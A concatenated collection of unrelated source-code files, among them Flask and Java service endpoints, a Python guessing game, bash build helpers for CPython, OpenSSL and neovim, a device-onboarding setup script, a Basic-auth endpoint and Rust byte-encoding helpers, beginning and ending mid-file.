QColor(238, 238, 238),
// Default colors
QColor(255, 255, 255),
QColor(85, 85, 85),
QColor(200, 200, 200), // Default font color
QColor(24, 24, 24) // Default background color
};
};
#endif // QLIGHTTERMINAL_H
|
from flask import request
from flask.json import jsonify
from flask_restful import Resource
from flask_pydantic import validate
from messenger.schema.job import RunSuiteBase, RunTemplateBase
from messenger.utils.response_util import RET
from celeryservice.tasks import run_suite, run_template
class RunSuiteEvent(Resource):
    """POST endpoint that schedules an asynchronous suite run via celery."""

    @validate()
    def post(self, body: RunSuiteBase):
        # Split the validated body into the task payload and the acting user.
        payload = body.__dict__
        user = {
            "user_id": payload.pop("user_id"),
            "auth": request.headers.get("authorization"),
        }
        run_suite.delay(payload, user)
        return jsonify(
            error_code=RET.OK,
            error_msg="succeed in creating the job for running suite"
        )
class RunTemplateEvent(Resource):
    """POST endpoint that schedules an asynchronous template run via celery."""

    @validate()
    def post(self, body: RunTemplateBase):
        # Split the validated body into the task payload and the acting user.
        payload = body.__dict__
        user = {
            "user_id": payload.pop("user_id"),
            "auth": request.headers.get("authorization"),
        }
        run_template.delay(payload, user)
        return jsonify(
            error_code=RET.OK,
            error_msg="succeed in creating the job for running template"
        )
|
package com.javakc.pms.dispord.service;
import com.javakc.commonutils.jpa.base.service.BaseService;
import com.javakc.commonutils.jpa.dynamic.SimpleSpecificationBuilder;
import com.javakc.pms.dispord.dao.DispOrdDao;
import com.javakc.pms.dispord.entity.DispOrd;
import com.javakc.pms.dispord.vo.DispOrdQuery;
import org.springframework.data.domain.Page;
import org.springframework.data.domain.PageRequest;
import org.springframework.stereotype.Service;
import org.springframework.util.StringUtils;
import java.util.List;
@Service
public class DispOrdService extends BaseService<DispOrdDao,DispOrd> {
// @Autowired
// private DispOrdDao dispOrdDao;
/**
* 查询所有调度指令库
* @return
*/
public List<DispOrd> findAll() {
return dao.findAll();
}
public Page<DispOrd> findPage(DispOrdQuery dispOrdQuery, int pageNo, int pageSize){
SimpleSpecificationBuilder<DispOrd> simpleSpecificationBuilder=new SimpleSpecificationBuilder();
if (!StringUtils.isEmpty(dispOrdQuery.getOrderName()))
{
/**
* 可用操作符
* = 等值、!= 不等值 (字符串、数字)
* >=、<=、>、< (数字)
* ge,le,gt,lt(字符串)
* :表示like %v%
* l:表示 v%
* :l表示 %v
* null表示 is null
* !null表示 is not null
*/
simpleSpecificationBuilder.and("orderName", ":", dispOrdQuery.getOrderName());
}
if (!StringUtils.isEmpty(dispOrdQuery.getBeginDate())) {
simpleSpecificationBuilder.and("gmtCreate", "ge" , dispOrdQuery.getBeginDate());
}
if (!StringUtils.isEmpty(dispOrdQuery.getEndDate())) {
simpleSpecificationBuilder.and("gmtCreate", "lt", dispOrdQuery.getEndDate());
}
return dao.findAll(simpleSpecificationBuilder.getSpecification(), PageRequest.of(pageNo-1,pageSize));
}
} |
<filename>InteractiveProgramming/guess.py<gh_stars>0
# template for "Guess the number" mini-project
# input will come from buttons and an input field
# all output for the game will be printed in the console
import simplegui
import random
import math
# Current guessing range is the half-open interval [range_low, range_high).
range_low = 0
range_high = 100
# When True, new_game() draws a fresh random range for each round.
use_random_range = False
# The number the player must guess; set by computer_guess().
secret_number = None
# Guesses left in the current round; set by start_game().
guesses_remaining = 0
# helper function to start and restart the game
def new_game():
    """Restart the game using the currently selected range mode."""
    global use_random_range
    if not use_random_range:
        start_game()
    else:
        range_random()
def start_game():
global range
global guesses_remaining
computer_guess()
guesses_remaining = math.ceil(math.log(range_high-range_low+1,2))
print "Guess a number between ",range_low,"and",range_high-1
print "You have %d guesses remaining"%(guesses_remaining)
frame.start()
def computer_guess():
    # Pick the secret number uniformly from [range_low, range_high).
    global secret_number
    global range_low
    global range_high
    secret_number = random.randrange(range_low,range_high)
# define event handlers for control panel
def range100():
    """Button handler: switch to the fixed [0, 100) range and restart."""
    global range_low, range_high, use_random_range
    use_random_range = False
    range_low, range_high = 0, 100
    new_game()
def range1000():
    """Button handler: switch to the fixed [0, 1000) range and restart."""
    global range_low, range_high, use_random_range
    use_random_range = False
    range_low, range_high = 0, 1000
    new_game()
def range_random():
    # button that changes the range to [x,y] and starts a game
    global range_low
    global range_high
    global use_random_range
    use_random_range=True
    # Random window of 100..999 numbers starting somewhere in [0, 1000).
    range_low = random.randrange(0,1000)
    range_high = range_low + 100 + random.randrange(0,900)
    start_game()
def input_guess(guess):
# main game logic goes here
global secret_number
global guesses_remaining
try:
guess = float(guess)
except:
print "Enter a number and try again"
return
else:
print "You guessed",guess
if guess == secret_number:
print "Correct"
new_game()
return
guesses_remaining -= 1
if guesses_remaining <= 0:
print "Sorry! You ran out of guesses, my number was %d, let's play again."%(secret_number)
new_game()
return
if guess > secret_number:
print "You have %d guesses remaining, my number is lower"%(guesses_remaining)
else:
print "You have %d guesses remaining, my number is higher"%(guesses_remaining)
# create frame (simplegui is the CodeSkulptor GUI toolkit; the frame hosts
# the buttons and the guess input field)
frame = simplegui.create_frame("Guess Number",300,300)
# register event handlers for control elements and start frame
frame.add_button("Range: 0 - 100", range100, 150)
frame.add_button("Range: 0 - 1000", range1000, 150)
frame.add_button("Range: x - y (both random)", range_random, 150)
frame.add_input("Guess: ",input_guess, 100)
# call new_game to kick off the first round
new_game()
# always remember to check your completed program against the grading rubric
|
#!/bin/bash
# Helper utilities for build
# Download locations for the build inputs.
PYTHON_DOWNLOAD_URL=https://www.python.org/ftp/python
# NOTE(review): plain http -- consider https; the tarball is sha256-verified
# below, which mitigates but does not remove the risk.
OPENSSL_DOWNLOAD_URL=http://www.openssl.org/source
GET_PIP_URL=https://bootstrap.pypa.io/get-pip.py
function check_var {
    # Abort the build when a required value is empty.
    # NOTE(review): the message cannot name the variable because the *value*
    # is passed in, not the variable name.
    if [ -z "$1" ]; then
        echo "required variable not defined"
        exit 1
    fi
}
function lex_pyver {
    # Echoes Python version string padded with zeros so versions compare
    # lexically / numerically. Thus:
    #   3.2.1 -> 003002001
    #   3     -> 003000000
    # Fix: quote "$1" so the argument is not word-split before awk sees it.
    echo "$1" | awk -F "." '{printf "%03d%03d%03d", $1, $2, $3}'
}
function do_cpython_build {
    # Build and install one CPython under /opt/_internal, then expose it
    # under /opt/python/<abi_tag> with pip and wheel preinstalled.
    #   $1 = CPython version (e.g. 2.7.18)
    #   $2 = unicode setting: ucs2, ucs4, or "none" (for Python 3)
    # Assumes Python-$1.tgz and get-pip.py are already in the cwd.
    local py_ver=$1
    check_var $py_ver
    local ucs_setting=$2
    check_var $ucs_setting
    tar -xzf Python-$py_ver.tgz
    pushd Python-$py_ver
    if [ "$ucs_setting" = "none" ]; then
        unicode_flags=""
        dir_suffix=""
    else
        local unicode_flags="--enable-unicode=$ucs_setting"
        local dir_suffix="-$ucs_setting"
    fi
    local prefix="/opt/_internal/cpython-${py_ver}${dir_suffix}"
    sudo mkdir -p ${prefix}/lib
    # Hand the prefix to the unprivileged build user so make install works.
    sudo chown vagrant:vagrant -R ${prefix}
    # -Wformat added for https://bugs.python.org/issue17547 on Python 2.6
    CFLAGS="-Wformat" ./configure --prefix=${prefix} --disable-shared $unicode_flags > /dev/null
    make -j2 > /dev/null
    make install > /dev/null
    popd
    rm -rf Python-$py_ver
    # Some python's install as bin/python3. Make them available as
    # bin/python.
    if [ -e ${prefix}/bin/python3 ]; then
        ln -s python3 ${prefix}/bin/python
    fi
    ${prefix}/bin/python get-pip.py
    ${prefix}/bin/pip install wheel
    # MY_DIR must be set by the caller; the helper prints e.g. "cp37-cp37m".
    local abi_tag=$(${prefix}/bin/python ${MY_DIR}/python-tag-abi-tag.py)
    ln -s ${prefix} /opt/python/${abi_tag}
}
function build_cpython {
    # Download one CPython tarball and build it. Versions below 3.3 are
    # built twice, once per unicode width (ucs2 and ucs4); newer versions
    # take no unicode flag.
    local py_ver=$1
    check_var $py_ver
    check_var $PYTHON_DOWNLOAD_URL
    wget -q $PYTHON_DOWNLOAD_URL/$py_ver/Python-$py_ver.tgz
    if [ $(lex_pyver $py_ver) -lt $(lex_pyver 3.3) ]; then
        do_cpython_build $py_ver ucs2
        do_cpython_build $py_ver ucs4
    else
        do_cpython_build $py_ver none
    fi
    rm -f Python-$py_ver.tgz
}
function build_cpythons {
    # Download get-pip.py once, then build every requested CPython version.
    check_var $GET_PIP_URL
    curl -sLO $GET_PIP_URL
    # Fix: quote "$@" so each version argument survives word splitting intact.
    for py_ver in "$@"; do
        build_cpython $py_ver
    done
    rm get-pip.py
}
function do_openssl_build {
    # Static, position-independent OpenSSL without SSLv2, installed to
    # /usr/local/ssl. Assumes the cwd is the extracted source tree.
    ./config no-ssl2 no-shared -fPIC --prefix=/usr/local/ssl > /dev/null
    make > /dev/null
    sudo make install > /dev/null
}
function check_sha256sum {
    # Verify file $1 against expected sha256 digest $2; sha256sum -c exits
    # non-zero on mismatch, aborting callers that use set -e.
    # NOTE(review): GNU sha256sum -c conventionally expects two spaces
    # between digest and filename -- confirm the format below parses on the
    # target coreutils version.
    local fname=$1
    check_var ${fname}
    local sha256=$2
    check_var ${sha256}
    echo "${sha256} ${fname}" > ${fname}.sha256
    sha256sum -c ${fname}.sha256
    rm ${fname}.sha256
}
function build_openssl {
    # Download, sha256-verify, build, and install OpenSSL.
    #   $1 = versioned tarball basename (e.g. openssl-1.0.2k)
    #   $2 = expected sha256 of the tarball
    local openssl_fname=$1
    check_var ${openssl_fname}
    local openssl_sha256=$2
    check_var ${openssl_sha256}
    check_var ${OPENSSL_DOWNLOAD_URL}
    curl -sLO ${OPENSSL_DOWNLOAD_URL}/${openssl_fname}.tar.gz
    check_sha256sum ${openssl_fname}.tar.gz ${openssl_sha256}
    tar -xzf ${openssl_fname}.tar.gz
    # Build in a subshell so the cwd is restored afterwards.
    (cd ${openssl_fname} && do_openssl_build)
    rm -rf ${openssl_fname} ${openssl_fname}.tar.gz
}
|
// Countdown display element
const timerElement = document.getElementById('timer');

// Tick once per second: show the current value, then decrement, wrapping
// back to 60 after 0 has been displayed (so the display never goes negative).
let countdown = 60;
const timer = setInterval(() => {
  timerElement.innerHTML = countdown;
  countdown -= 1;
  if (countdown < 0) {
    countdown = 60;
  }
}, 1000);
TERMUX_PKG_HOMEPAGE=https://neovim.io/
TERMUX_PKG_DESCRIPTION="Ambitious Vim-fork focused on extensibility and agility (nvim)"
TERMUX_PKG_LICENSE="Apache-2.0"
TERMUX_PKG_MAINTAINER="@termux"
TERMUX_PKG_VERSION=0.4.4
TERMUX_PKG_REVISION=2
TERMUX_PKG_SRCURL=https://github.com/neovim/neovim/archive/v${TERMUX_PKG_VERSION}.tar.gz
TERMUX_PKG_SHA256=2f76aac59363677f37592e853ab2c06151cca8830d4b3fe4675b4a52d41fc42c
TERMUX_PKG_DEPENDS="libiconv, libuv, luv, libmsgpack, libandroid-support, libvterm, libtermkey, liblua53, libunibilium"
# A host build is required: the cross build consumes host-built gperf and
# luajit from $TERMUX_PKG_HOSTBUILD_DIR/deps (see termux_step_host_build).
TERMUX_PKG_HOSTBUILD=true
# Extra CMake flags. Host tools (msgfmt, msgmerge, pkg-config, xgettext)
# are resolved at parse time via $(which ...).
TERMUX_PKG_EXTRA_CONFIGURE_ARGS="
-DENABLE_JEMALLOC=OFF
-DGETTEXT_MSGFMT_EXECUTABLE=$(which msgfmt)
-DGETTEXT_MSGMERGE_EXECUTABLE=$(which msgmerge)
-DGPERF_PRG=$TERMUX_PKG_HOSTBUILD_DIR/deps/usr/bin/gperf
-DLUA_PRG=$TERMUX_PKG_HOSTBUILD_DIR/deps/usr/bin/luajit
-DPKG_CONFIG_EXECUTABLE=$(which pkg-config)
-DXGETTEXT_PRG=$(which xgettext)
-DPREFER_LUA=ON
-DLUA_INCLUDE_DIR=$TERMUX_PREFIX/include/lua5.3
"
# Marked as a conffile so user edits survive package upgrades.
TERMUX_PKG_CONFFILES="share/nvim/sysinit.vim"
termux_step_host_build() {
    # Build neovim's bundled third-party deps for the build host, then do a
    # throwaway host install so generated sources/tools exist for the
    # cross-compile step.
    termux_setup_cmake
    mkdir -p $TERMUX_PKG_HOSTBUILD_DIR/deps
    cd $TERMUX_PKG_HOSTBUILD_DIR/deps
    cmake $TERMUX_PKG_SRCDIR/third-party
    make -j 1
    cd $TERMUX_PKG_SRCDIR
    make CMAKE_EXTRA_FLAGS="-DCMAKE_INSTALL_PREFIX=$TERMUX_PKG_HOSTBUILD_DIR -DUSE_BUNDLED_LUAROCKS=ON" install
    # Clean so the later cross-compile starts from a pristine source tree.
    make distclean
    rm -Rf build/
}
termux_step_pre_configure() {
    # Point CMake at the NDK sysroot's libm for the target ABI/API level.
    TERMUX_PKG_EXTRA_CONFIGURE_ARGS+=" -DLUA_MATH_LIBRARY=$TERMUX_STANDALONE_TOOLCHAIN/sysroot/usr/lib/$TERMUX_HOST_PLATFORM/$TERMUX_PKG_API_LEVEL/libm.so"
}
termux_step_post_make_install() {
    # Install the Termux-specific sysinit.vim (listed in TERMUX_PKG_CONFFILES).
    local _CONFIG_DIR=$TERMUX_PREFIX/share/nvim
    mkdir -p $_CONFIG_DIR
    cp $TERMUX_PKG_BUILDER_DIR/sysinit.vim $_CONFIG_DIR/
}
termux_step_create_debscripts() {
	# postinst: register nvim with update-alternatives on configure /
	# abort-upgrade. "\$1" is escaped so it expands when the maintainer
	# script runs at install time, not while building the package.
	cat <<- EOF > ./postinst
	#!$TERMUX_PREFIX/bin/sh
	if [ "\$1" = "configure" ] || [ "\$1" = "abort-upgrade" ]; then
	if [ -x "$TERMUX_PREFIX/bin/update-alternatives" ]; then
	update-alternatives --install \
	$TERMUX_PREFIX/bin/editor editor $TERMUX_PREFIX/bin/nvim 40
	update-alternatives --install \
	$TERMUX_PREFIX/bin/vi vi $TERMUX_PREFIX/bin/nvim 15
	fi
	fi
	EOF
	# prerm: drop the alternatives on removal, but keep them on upgrade.
	cat <<- EOF > ./prerm
	#!$TERMUX_PREFIX/bin/sh
	if [ "\$1" != "upgrade" ]; then
	if [ -x "$TERMUX_PREFIX/bin/update-alternatives" ]; then
	update-alternatives --remove editor $TERMUX_PREFIX/bin/nvim
	update-alternatives --remove vi $TERMUX_PREFIX/bin/nvim
	fi
	fi
	EOF
}
#!/bin/bash
### COLOR OUTPUT ###
# ANSI SGR escape sequences used by the print helpers below.
ESeq="\x1b["
RCol="$ESeq"'0m' # Text Reset
# Regular Bold Underline High Intensity BoldHigh Intens Background High Intensity Backgrounds
Bla="$ESeq"'0;30m'; BBla="$ESeq"'1;30m'; UBla="$ESeq"'4;30m'; IBla="$ESeq"'0;90m'; BIBla="$ESeq"'1;90m'; On_Bla="$ESeq"'40m'; On_IBla="$ESeq"'0;100m';
Red="$ESeq"'0;31m'; BRed="$ESeq"'1;31m'; URed="$ESeq"'4;31m'; IRed="$ESeq"'0;91m'; BIRed="$ESeq"'1;91m'; On_Red="$ESeq"'41m'; On_IRed="$ESeq"'0;101m';
Gre="$ESeq"'0;32m'; BGre="$ESeq"'1;32m'; UGre="$ESeq"'4;32m'; IGre="$ESeq"'0;92m'; BIGre="$ESeq"'1;92m'; On_Gre="$ESeq"'42m'; On_IGre="$ESeq"'0;102m';
Yel="$ESeq"'0;33m'; BYel="$ESeq"'1;33m'; UYel="$ESeq"'4;33m'; IYel="$ESeq"'0;93m'; BIYel="$ESeq"'1;93m'; On_Yel="$ESeq"'43m'; On_IYel="$ESeq"'0;103m';
Blu="$ESeq"'0;34m'; BBlu="$ESeq"'1;34m'; UBlu="$ESeq"'4;34m'; IBlu="$ESeq"'0;94m'; BIBlu="$ESeq"'1;94m'; On_Blu="$ESeq"'44m'; On_IBlu="$ESeq"'0;104m';
Pur="$ESeq"'0;35m'; BPur="$ESeq"'1;35m'; UPur="$ESeq"'4;35m'; IPur="$ESeq"'0;95m'; BIPur="$ESeq"'1;95m'; On_Pur="$ESeq"'45m'; On_IPur="$ESeq"'0;105m';
Cya="$ESeq"'0;36m'; BCya="$ESeq"'1;36m'; UCya="$ESeq"'4;36m'; ICya="$ESeq"'0;96m'; BICya="$ESeq"'1;96m'; On_Cya="$ESeq"'46m'; On_ICya="$ESeq"'0;106m';
Whi="$ESeq"'0;37m'; BWhi="$ESeq"'1;37m'; UWhi="$ESeq"'4;37m'; IWhi="$ESeq"'0;97m'; BIWhi="$ESeq"'1;97m'; On_Whi="$ESeq"'47m'; On_IWhi="$ESeq"'0;107m';
# Print a highlighted section header.
printSection() {
    echo -e "${BIYel}>>>> ${BIWhi}${1}${RCol}"
}
# Informational message (bright white).
info() {
    echo -e "${BIWhi}${1}${RCol}"
}
# Success message (bright green).
success() {
    echo -e "${BIGre}${1}${RCol}"
}
# Error message (bright red), without exiting.
error() {
    echo -e "${BIRed}${1}${RCol}"
}
# Error message, then abort the script with status 1.
errorAndExit() {
    echo -e "${BIRed}${1}${RCol}"
    exit 1
}
# Require the manufacturer URL and device model arguments.
if [[ $# -ne 2 ]]; then
    error "Not enough arguments"
    error "Usage: ${0} <MANUFACTURER_URL> <DEVICE_MODEL>"
    error "Example: ${0} http://fdo-manufacturer.portainer.io:8039 dell-optiplex-7090"
    exit 1
fi

# https://github.com/secure-device-onboard/client-sdk-fidoiot/blob/master/docs/setup.md#3-setting-the-manufacturer-network-address
MANUFACTURER=${1}
info "Setting Manufacturer URL to ${MANUFACTURER}"
echo -n "${MANUFACTURER}" > data/manufacturer_addr.bin

# https://github.com/secure-device-onboard/client-sdk-fidoiot/blob/master/docs/setup.md#4-elliptic-curve-digital-signature-algorithm-ecdsa-private-key-file-generation
info "Generating private key"
utils/keys_gen.sh .

MODEL=${2}
info "Setting Model to ${MODEL}"
# Fix: quoted to prevent word splitting/globbing of the model string.
echo -n "${MODEL}" > data/manufacturer_mod.bin

# Serial number: first segment of a fresh UUID.
SERIAL=$(uuidgen | sed 's/-.*//')
info "Setting Serial Number to ${SERIAL}"
echo -n "${SERIAL}" > data/manufacturer_sn.bin

info "Starting Device Initialization"
./build/linux-client

info "Device Initialization finished - Serial: ${SERIAL}"
<reponame>campenr/ensparser
import unittest
import os.path
import pandas as pd
from multiplate import multiplateIO
# Directory containing fixture files, relative to this test module.
TEST_DATA_DIR = os.path.join(os.path.dirname(__file__), "test_data")
class TestIsInstance(unittest.TestCase):
    def test_enspire_csv_parser(self):
        """Check that parsed EnSpire csv matches expected data"""
        test_dir = os.path.join(TEST_DATA_DIR, "EnSpire")
        parsed = multiplateIO.parse_csv(
            os.path.join(test_dir, "raw_plate_data_enspire.csv"), "enspire"
        )
        expected = pd.read_pickle(os.path.join(test_dir, "expected_plate_data.pkl"))
        # parse_csv yields a single data set; compare every frame it produces.
        for frame in parsed:
            self.assertTrue(frame.equals(expected))
# Run the test suite when this module is executed directly.
if __name__ == '__main__':
    unittest.main()
def f(x):
    """One Collatz step: halve an even number, map an odd x to 3x + 1."""
    return x // 2 if x % 2 == 0 else 3 * x + 1
def collatz_sequence(n):
    """Print the Collatz sequence starting at ``n`` and return it as a list.

    Generalization: the sequence is now returned (previously the function
    returned None), which is backward compatible and makes the result
    reusable and testable. The step is computed inline (equivalent to the
    sibling ``f``) so this function is self-contained.
    """
    sequence = [n]
    while n != 1:
        n = n // 2 if n % 2 == 0 else 3 * n + 1
        sequence.append(n)
    print(*sequence)
    return sequence

# Example usage
collatz_sequence(6)
# Test model artifact consumed by the harness.
MODELFILE_NAME="l2pool2d_test.tflite"
# This test is currently not run; set to "enabled" to activate it.
STATUS="disabled"
|
#!/bin/sh
# Reset the working tree: abort on first failure, clean build artifacts
# quietly, then remove untracked files and directories.
set -e
make distclean -s
git clean -fdq
# git restore . -q
#!/bin/bash
# Save labelled snapshots of model state files and parameter logs into a
# per-run directory.
#   usage: ./save runid label [description]
if [ $# -lt 2 ]
then
    echo "usage: ./save runid label description"
    echo " "
    exit
fi
runid=$1
label=$2
# Prompt for a description when it was not passed as the third argument.
if [ $# -ne 3 ]
then
    read -p "Please describe label '$label': " -e label_description
else
    label_description=$3
fi
echo ""
echo "Storing model states with label" $label "in directory" $runid
echo ""
mkdir -vp $runid
# Copy every model snapshot, replacing "output" in the name with the label.
for model in *_output.h5
do
    newfile=${model/output/$label}
    cp -v $model $runid/$newfile
done
# Copy fort.44
cp -v fort.44 $runid/fort.44
# Copy parameter files-------------------------------------------------
logdir=$runid/log_label_$label
echo ""
echo "Storing parameterlists in directory" $logdir
echo ""
mkdir -vp $logdir
# Prepend the label description as an XML comment to each parameter list.
for paramlist in *.xml
do
    newparamlist=${paramlist/.xml/_$label.xml}
    echo '<!-- LABEL' $label ': ' $label_description '-->' > $logdir/$newparamlist
    echo $paramlist '->' $logdir/$newparamlist
    cat $paramlist >> $logdir/$newparamlist
done
echo ""
echo "Copy outputfiles to" $logdir
echo ""
## Copy info files -----------------------------------------------------
# Each info file gets the label description prepended as its first line.
for infofile in info_*.txt
do
    newinfofile=${infofile/.txt/_lbl$label.txt}
    echo 'LABEL' $label ': ' $label_description > $logdir/$newinfofile
    echo $infofile '->' $logdir/$newinfofile
    cat $infofile >> $logdir/$newinfofile
done
## Copy cdata/tdata file ----------------------------------------------------
cdatafile=cdata.txt
newcdatafile=${cdatafile/.txt/_lbl$label.txt}
echo $cdatafile '->' $logdir/$newcdatafile
cat $cdatafile > $logdir/$newcdatafile
tdatafile=tdata.txt
newtdatafile=${tdatafile/.txt/_lbl$label.txt}
echo $tdatafile '->' $logdir/$newtdatafile
cat $tdatafile > $logdir/$newtdatafile
echo ""
echo "Building log" $logdir
echo ""
contpar=`grep '\"Continuation parameter\"' continuation_params.xml | sed 's/.*value=\"//' | sed 's/\".*//'`
initstep=`grep '\"initial step size\"' continuation_params.xml | sed 's/.*value=\"//' | sed 's/\".*//'`
maxnumstep=`grep '\"maximum number of steps\"' continuation_params.xml | sed 's/.*value=\"//' | sed 's/\".*//'`
destvalue=`grep 'summary' -A20 info_0.txt | tail -n 21 | grep 'destination value' | sed 's/.*: //'`
parvalue=`grep 'summary' -A20 info_0.txt | tail -n 21 | grep 'parameter value' | sed 's/.*: //'`
startvalue=`grep 'summary' -A20 info_0.txt | tail -n 21 | grep 'starting value' | sed 's/.*: //'`
numsteps=`grep 'summary' -A20 info_0.txt | tail -n 21 | grep 'step:' | sed 's/.*: //'`
numresets=`grep 'summary' -A20 info_0.txt | tail -n 21 | grep 'resets:' | sed 's/.*: //'`
logfile=log
echo 'LABEL' $label ': ' $label_description > $logdir/$logfile
echo ' Continuation summary ' >> $logdir/$logfile
echo ' starting label: ' $startlabel >> $logdir/$logfile
echo ' parameter: ' $contpar >> $logdir/$logfile
echo ' parameter value: ' $parvalue >> $logdir/$logfile
echo ' starting value: ' $startvalue >> $logdir/$logfile
echo ' destination value: ' $destvalue >> $logdir/$logfile
echo ' initial step: ' $initstep >> $logdir/$logfile
echo ' total steps: ' $numsteps >> $logdir/$logfile
echo ' max allowed steps: ' $maxnumstep >> $logdir/$logfile
echo ' resets: ' $numresets >> $logdir/$logfile
echo "" >> $logdir/$logfile
all_logs=$runid/cont.log
echo "Collecting all logs in " $all_logs
echo ""
echo "Overview of labels; the order is based on time of label creation." > $all_logs
echo "" >> $all_logs
for logfile in `find $runid -name $logfile -printf "%T+%p\n" | sort`
do
cat ${logfile/*$runid/$runid} >> $all_logs
done
|
// Runtime configuration sourced from Vue CLI environment variables.
export default {
  // NOTE(review): Sentry conventionally calls this value a "DSN"; the "DNS"
  // spelling is kept because consumers reference SENTRY_DNS.
  SENTRY_DNS: process.env.VUE_APP_SENTRY_DNS
};
|
/*
* Copyright (c) 2016 Nike, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.nike.cerberus.endpoints.authentication;
import com.nike.backstopper.exception.ApiException;
import com.nike.cerberus.auth.connector.AuthResponse;
import com.nike.cerberus.domain.UserCredentials;
import com.nike.cerberus.error.DefaultApiError;
import com.nike.cerberus.service.AuthenticationService;
import com.nike.cerberus.service.EventProcessorService;
import com.nike.riposte.server.http.RequestInfo;
import com.nike.riposte.server.http.ResponseInfo;
import com.nike.riposte.server.http.StandardEndpoint;
import com.nike.riposte.util.AsyncNettyHelper;
import com.nike.riposte.util.Matcher;
import io.netty.channel.ChannelHandlerContext;
import io.netty.handler.codec.http.HttpMethod;
import org.apache.commons.codec.binary.Base64;
import org.apache.commons.lang3.ArrayUtils;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import javax.inject.Inject;
import javax.ws.rs.core.HttpHeaders;
import java.nio.charset.Charset;
import java.util.concurrent.CompletableFuture;
import java.util.concurrent.Executor;
import static com.nike.cerberus.endpoints.AuditableEventEndpoint.auditableEvent;
/**
* Authentication endpoint for user credentials. If valid, a client token will be returned.
*/
public class AuthenticateUser extends StandardEndpoint<Void, AuthResponse> {

    private final AuthenticationService authenticationService;
    private final EventProcessorService eventProcessorService;

    @Inject
    public AuthenticateUser(AuthenticationService authenticationService,
                            EventProcessorService eventProcessorService) {
        this.authenticationService = authenticationService;
        this.eventProcessorService = eventProcessorService;
    }

    /**
     * Runs {@code authenticate(request)} on the long-running task executor,
     * preserving tracing/MDC context across the async boundary.
     */
    @Override
    public CompletableFuture<ResponseInfo<AuthResponse>> execute(final RequestInfo<Void> request,
                                                                 final Executor longRunningTaskExecutor,
                                                                 final ChannelHandlerContext ctx) {
        return CompletableFuture.supplyAsync(
                AsyncNettyHelper.supplierWithTracingAndMdc(() -> authenticate(request), ctx),
                longRunningTaskExecutor
        );
    }

    /**
     * Authenticates the Basic-auth credentials from the Authorization header,
     * recording an audit event for both success and failure before responding.
     */
    private ResponseInfo<AuthResponse> authenticate(RequestInfo<Void> request) {
        final UserCredentials credentials = extractCredentials(request.getHeaders().get(HttpHeaders.AUTHORIZATION));
        AuthResponse authResponse = null;
        try {
            authResponse = authenticationService.authenticate(credentials);
        } catch (ApiException e) {
            // Audit the failed attempt, then propagate the original error.
            eventProcessorService.ingestEvent(auditableEvent(credentials.getUsername(), request, getClass().getSimpleName())
                    .withAction("failed to authenticate")
                    .withSuccess(false)
                    .build()
            );
            throw e;
        }
        eventProcessorService.ingestEvent(auditableEvent(credentials.getUsername(), request, getClass().getSimpleName())
                .withAction("authenticated")
                .build()
        );
        return ResponseInfo.newBuilder(authResponse).build();
    }

    @Override
    public Matcher requestMatcher() {
        return Matcher.match("/v2/auth/user", HttpMethod.GET);
    }

    /**
     * Extracts credentials from the Authorization header. Assumes its Basic auth.
     *
     * @param authorizationHeader Value from the authorization header
     * @return User credentials that were extracted
     */
    public UserCredentials extractCredentials(final String authorizationHeader) {
        final String authType = "Basic";
        // NOTE(review): startsWith("Basic") also matches e.g. "BasicFoo ..." --
        // a stricter check would require "Basic" plus a space; confirm intent.
        if (authorizationHeader != null && authorizationHeader.startsWith(authType)) {
            final String encodedCredentials = authorizationHeader.substring(authType.length()).trim();
            final byte[] decodedCredentials = Base64.decodeBase64(encodedCredentials);
            if (ArrayUtils.isNotEmpty(decodedCredentials)) {
                // Split on the first ':' only, so passwords may contain colons.
                final String[] credentials = new String(decodedCredentials, Charset.defaultCharset()).split(":", 2);
                if (credentials.length == 2) {
                    return new UserCredentials(credentials[0], credentials[1].getBytes(Charset.defaultCharset()));
                }
            }
        }
        throw ApiException.newBuilder().withApiErrors(DefaultApiError.AUTH_BAD_CREDENTIALS).build();
    }
}
|
from bs4 import BeautifulSoup

html = """
<!DOCTYPE html>
<html>
<head>
</head>
<body>
<div class="container">
<div class="row">
<div class="col">
<ul class="list">
<li class="description">Professionally</li>
<li class="bullet-item">Expert</li>
<li class="bullet-item">Fast</li>
<li class="bullet-item">New Technology</li>
<li class="bullet-item">Using Node Js and Framework</li>
<li class="cta-button"><a class="button" href="https://example.com">Contact</a></li>
</ul>
</div>
</div>
</div>
</body>
</html>
"""

soup = BeautifulSoup(html, 'html.parser')

# Gather the text of every bullet item, in document order.
bullet_items = []
for item in soup.find_all('li', class_='bullet-item'):
    bullet_items.append(item.text)

# The call-to-action link target.
cta_button_url = soup.find('li', class_='cta-button').a['href']

print(f"List of bullet items: {bullet_items}")
print(f"CTA button URL: {cta_button_url}")
import { SidebarValue } from './components-basic.model';

/**
 * Selection state produced by the sidebar component: the selected
 * top-level value and the selected nested value beneath it.
 */
export class OcSidebarSelectModel {
    /** Top-level sidebar entry involved in the selection. */
    parent: SidebarValue;
    /** Entry nested under `parent`; presumably unset for top-level selections — TODO confirm. */
    child: SidebarValue;
}
|
#!/usr/bin/env bash
# Minimal one-shot HTTP responder: discard the request headers, read the
# body line as a query, and pipe it through ./jp, echoing to stderr too.
# Fix: read -r prevents backslash mangling of header lines and the query.
# Consume HTTP header (blank line, CR stripped, terminates the headers)
while read -r line; do
    [[ -z ${line//$'\r'} ]] && break
done
read -r query
echo -e "HTTP/1.0 200 OK\r\ncontent-type: text/plain; charset=utf-8\r\n\r\n"
./jp "$query" | tee /dev/stderr
|
mod encode {
    /// Allocate a zeroed two-byte scratch buffer for [`u16`].
    pub fn u16_buffer() -> Vec<u8> {
        vec![0u8; 2]
    }

    /// Write `n` into `buf` in little-endian order and return the
    /// two-byte slice that was written.
    pub fn u16(n: u16, buf: &mut [u8]) -> &[u8] {
        let le = n.to_le_bytes();
        buf[0] = le[0];
        buf[1] = le[1];
        &buf[..2]
    }
}
mod decode {
    /// Read a little-endian `u16` from the first two bytes of `bytes`,
    /// or `None` when fewer than two bytes are available.
    pub fn u16(bytes: &[u8]) -> Option<u16> {
        match bytes {
            [lo, hi, ..] => Some(u16::from_le_bytes([*lo, *hi])),
            _ => None,
        }
    }
